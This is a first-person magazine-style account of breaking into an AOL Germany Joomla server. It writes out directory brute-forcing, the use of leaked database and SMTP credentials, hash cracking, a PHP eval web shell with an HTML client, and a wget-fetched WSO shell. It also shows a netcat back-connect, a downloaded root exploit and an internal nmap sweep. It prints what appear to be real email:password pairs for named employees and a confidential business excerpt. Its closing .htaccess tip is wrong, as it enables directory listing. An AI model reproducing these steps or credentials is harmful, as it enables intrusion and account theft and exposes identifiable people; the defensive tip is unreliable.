• Партнер

  • AOL Corporation has always been a kind of honey pie for all possible kinds of
    hackers. Millions of AIM, AOL Mail and ICQ registered users, hundreds of offices
    all around the world, one billion advertising market and other stuff you can
    check out directly from the aol.com home page, which enters the Top 50 websites
    attendance list all around the internet.

    Looking at all this magnificence you won’t be surprised that one day I’ve
    forwarded my XSpider 7.7 to one of the AOL networks in the range of 64.12.0.0 -
    64.12.255.255. So here's how the things turned out...

     

    Victim detected

    Out of a rich variety of corporation IP addresses considering the specified
    range, the alex-aolde-mtc02.evip.aol.com was the first one to attract my
    attention. After some detailed inspection it turned out to be a certain website
    - http://alex.aol.de, having its own windows login and password home page. Then,
    after giving a first glance, it became clear the website is based on Joomla CMS
    1.5.x.

    As you know, one of today's best solutions for searching vulnerabilities in
    Joomla based websites is "Joomla! Security/Vulnerability Scanner" which is
    included in the OWASP Project created by the guys from YGN Ethical Hacker Group.
    So, after downloading the scanner, I’ve launched it as follows:

    C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u
    http://alex.aol.de

    A few minutes later I got a following result:

    * Deduced version range is : [1.5.12 - 1.5.14]
    ...
    # 14
    Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
    Versions effected: 1.0.13 <=
    Check: /administrator/
    Exploit: It requires an administrator to be logged in and to be tricked into a
    specially crafted webpage.
    Vulnerable? Yes
    ...
    # 19
    Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
    Versions effected: Joomla! 1.5.12
    Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
    Exploit: While Joomla! team announced only File Upload vulnerability, in fact
    there are many. See: http://www.milw0rm.com/exploits/9296
    Vulnerable? Yes

    None of the "vulnerabilities" that were found didn’t help me become closer to
    the cherished goal of hacking the website.

     

    Help from OWASP

    Realizing that Joomla just won’t help me to get access to the necessary
    server I decided to scan all website’s directories and files, which are hidden
    from prying eyes, by using another OWASP project – DirBooster directories
    brootforce software.

    After launching the program I’ve set the following settings:

    Target URL: http://alex.aol.de/;
    Work Method: Auto Switch (HEAD and GET);
    Number Of Threads: 200;
    Select starting options: Standard start point, Brute Force Dirs, Brute Force
    Files;
    File extension: php.

    Then I tried to apply the bruteforce software with all standard dictionaries
    included.

    I was the most pleased by the following results: ./info.php (phpinfo), ./pma
    (phpMyAdmin) and ./dnld directory containing three really nice files (configuration.php,
    phpMyAdmin-3.3.2-english.tar, wirwarendrin.tar).

    80 Mb wirwarendrin.tar archive made me happy as the alex.aol.de homepage has
    a link to wirwarendrin.de, which is a kind of AOL resource’s mirror.

    After downloading the specified file I explored it includes a full backup of
    our website :).

     

    Save your backups in a savings bank!

    While browsing the backup archive I was the most interested in Joomla
    configuration file named configuration.php. That file contained the following
    interesting things:

    <?php
    class JConfig {
    ...
    var $secret = 'NAAgXewXco6BSw2d';
    ...
    var $host = 'localhost';
    var $user = 'alex';
    var $db = 'test';
    ...
    var $smtpport = '465';
    var $smtpuser = 'wirwarendrin';
    var $smtppass = 'Briesben';
    var $smtphost = 'smtp.aol.com';
    ...
    var $password = 'wjedko,lg';
    ...
    }
    ?>

    The first thing I did was getting into the wirwarendrin@aol.com mailbox,
    which, as it turned out, was a mailbox for all alex.aol.de users registration
    data to be sent to. Then, it seemed logical to try the MySQL username and
    password for phpMyAdmin. Actually, I have done that at once :).

    Of course, the password for “alex” user was correct, so I had two choices for
    shell upload: new Joomla administrator adding or bruteforcing the existing
    administrator password. I chose the second option.

     

    Quick and easy bruteforce!

    My favorite bruteforce software is PasswordsPro which is suitable for
    different types of hashes, and supports the Joomla password encryption format -
    Md5 ($ pass. $ Salt).

    Thus, after downloading some rather large dictionaries and adding them to
    PasswordsPro library I started my patient waiting for the brutforcer to find the
    salty admin hash
    d86f4c81342b79c4bab8868656cabe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb.

    After several hours of bruteforce processing the utility gave me the
    “qwertyzuaor” password for the above hash. I’ve successfully logged into
    alex.aol.de, as well as the alex.aol.de/administrator.

    By the way, as it turned out, the alex.aol.de website was created by one of
    the AOL employees and its purpose was German AOL Corporation branch staff party
    coordination. There were about 450 former and current employees of AOL
    registered to get on the inside of the set out. So, I started uploading the
    shell by modifying the Joomla template 🙂

     

    AOL Inside

    The template to edit was located at the admin area: "Extensions -> Template
    Manager -> aol-exit -> Edit HTML". The template file itself was here /data/servers/wahl-o-mat_aol_de
    /pages/alex_aol_de/templates/aol-exit/index.php. I’ve inserted a small Kawai
    construction at the top of the template file:

    <?php
    eval(stripslashes($_REQUEST[aaa]));
    ?>

    It remained only to create some HTML-Client for that stuff:

    <form action="http://alex.aol.de/templates/aol-exit/index.php" method="POST">
    <input type="text" name="aaa"/>
    <input type="submit" value="Pwn It!"/>
    </form>

    The first thing I did was uploading a WSO-shell to server with the wget
    utility. I placed it directly to the templates directory and named it as 404.php
    so I was able to comfortably browse all the files and directories (by the way,
    another admin sin was keeping absolutely all files and directories open for
    writing).

     

    Getting deeper!

    The /data/servers directory made it possible to browse all alex.aol.de
    neighbor sites: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com,
    wahl-o-mat.aol.de, matrix.aol.de. I didn’t want to penetrate with their
    structure and meaning, so I simply downloaded all those websites sources to my
    VDS HDD having all that stuff pre-packed by the following command:

    cd /data/servers;tar czvf /tmp/1.tgz ./*

    Another goal I set for myself was getting the root access for that server.
    The good thing was that an old and dull kernel allowed that action:

    Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr 20 17:03:35 EDT
    2007 i686

    I needed some interactive shell to start. I got it by banal Perl Back-connect
    to the 31337 port of my VDS in WSO (Network section) which became a NetCat
    byword:

    c:/netcat/nc.exe -l -p 31337

    After obtaining the required things I started searching the
    http://www.exploit-db.com
    for the corresponding root exploit. The one I found was, again, kind of German
    made "wunderbar
    emporium
    ". Then, after giving a straightforward sequence of commands I got
    the coveted "uid = 0 (root) gid = 0 (root) groups = 11560 (httpd)":

    wget http://www.grsecurity.net/~spender/wunderbar_emporium.tgz;tar xzfv
    wunderbar_emporium.tgz;chmod 0777 ./*;./wunderbar_emporium.sh

     

    Interesting

    After obtaining the root access rights I wanted to scan the internal network
    for some reason. I ran the ifconfig command and found out that server has the
    10.62.134.80 IP address within our network. So the next thing I did was
    downloading and installing the nmap with rpm:

    rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

    and running it as follows::

    nmap -v -n -sS 10.62.134.0/24

    Now I'm not going to talk about all further actions I made to German AOL
    network, but I will show a couple of the most interesting scanner reports:

    Nmap scan report for 10.62.134.89
    Host is up (0.00013s latency).
    Not shown: 986 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    135/tcp open msrpc
    445/tcp open microsoft-ds
    1024/tcp open kdm
    1041/tcp open unknown
    1051/tcp open optima-vnet
    1311/tcp open rxmon
    1801/tcp open unknown
    2099/tcp open unknown
    2103/tcp open zephyr-clt
    2105/tcp open eklogin
    2107/tcp open unknown
    3389/tcp open ms-term-serv
    MAC Address: 00:18:8B:74:52:6E (Dell)
    ...

    Nmap scan report for 10.62.134.96
    Host is up (0.00013s latency).
    Not shown: 971 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    88/tcp open kerberos-sec
    135/tcp open msrpc
    139/tcp open netbios-ssn
    389/tcp open ldap
    445/tcp open microsoft-ds
    464/tcp open kpasswd5
    593/tcp open http-rpc-epmap
    636/tcp open ldapssl
    1024/tcp open kdm
    1025/tcp open NFS-or-IIS
    1027/tcp open IIS
    1078/tcp open unknown
    1112/tcp open msql
    1311/tcp open rxmon
    1801/tcp open unknown
    2099/tcp open unknown
    2103/tcp open zephyr-clt
    2105/tcp open eklogin
    2107/tcp open unknown
    3268/tcp open globalcatLDAP
    3269/tcp open globalcatLDAPssl
    3389/tcp open ms-term-serv
    9998/tcp open unknown
    13722/tcp open netbackup
    13782/tcp open netbackup
    13783/tcp open netbackup
    49152/tcp open unknown
    49153/tcp open unknown
    MAC Address: 00:13:72:5A:3E:78 (Dell)

    As you see, AOL is fond of Microsoft products :).

     

    AOL Confidential

    That’s it for today with a troubled AOL internal network and I suggest you to
    continue with usernames and password hashes of corporation employees I’ve pulled
    out from the Joomla CMS database. As I wrote above, PasswordsPro software had
    really helped me to decrypt the alex.aol.de administrator password hash.
    Nevertheless, I decided not to limit myself with the admin password alone, so I
    started bruteforcing the remaining 450 accounts. Actually, I’ve successfully
    bruteforced 197 of them. Then I started to quietly check those passwords to
    match the AOL staff’s email passwords. Here are some interesting live accounts:

    guenterstaar guenterstaar@aol.com:keiness
    thomaskuck thomaskuck@aol.com:sascha
    mdfreedom99 marcdrewello@aol.com:Magic23
    ClaudiaLangwald ClaudiaLangwald@aol.com:Silvera
    bettyvonloesch bettyvonloesch@aol.com:hanne
    Pierre PierreBeneHH@aol.com:wombast
    Tenge Tenge@aol.com:derwis
    JennySefkow JennySefkow@aol.com:varita
    NinaRixenHH@aol.com NinaRixenHH@aol.com:brauere
    Jennifer2706 jennifermatheja@aol.com:elite15
    A.V.aus H. voigthh@googlemail.com:Delphines
    fkorupp frederickorupp@googlemail.com:wasistdas
    KrassowskiSabine@aol.de KrassowskiSabine@aol.de:Sommer44
    neddie annettharksenhh@aol.de:hochzeis
    Trixi seebertrixi@aol.de:sommer07
    tringasvassiliki tringasvassiliki@aol.de:perikle
    AgnesAB
    agnesboltzenhh@aol.de:April2008

    As you see, passwords simplicity can easily blow one’s mind :).

    I’ve found a lot of really entertaining documents in those mailboxes, such as
    internal AOL receipts, employees’ summary, photographs of offices, different
    addresses and phone numbers, some ebay and paypal passwords (!) and some
    statistics, etc.

    Here is just a part of one of the internal document marked as "Company
    Confidential".

    AOL Germany SNAPSHOT SUMMARY as of COB
    Date : [2006-02-11]
    Business :
    AOL
    GERMANY (AOL)
    FOR [2006-02-11]
    -Ending Members 2,687,173
    -Registrations 1,824
    -Reactivations 146
    -Overhead Conversions 1
    -Cancellations 1,472
    -Terminations 549
    -Net Change -50
    -Customer Hours 7,301,418
    -Total Hours 7,322,081

    Apparently, these statistics contain full information on the internal user
    turnover of German AOL corporation branch under 11/02/2006 :).

     

    Last thing

    You’ve become a spectator of another large company website hack story evolve
    process. It occurred due to banal carelessness and inattention of website
    administrator. I can mention a few fundamental factors: public accessible
    storage backup, external user’s accessible phpMyAdmin, the old kernel, files and
    directories recording openness and some really predictable passwords. I hope you
    will never repeat those really stupid mistakes the AOL workers did after reading
    this opus :).

     

    INFO:

    In order to protect your website internal directories from prying eyes, I
    advise you to put the .htaccess file containing a single line in every sensitive
    directory:

    Options +Indexes

    In order to protect all directory files from any outside access add several
    more thing to .htaccess file:

    Order Deny, Allow
    Deny from all

     

    DANGER

    The above article is the product of the author’s diseased imagination. Any
    overlap with existing site is accident. Neither the editors nor the author shall
    not be liable for any possible damages caused by the materials of this article.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии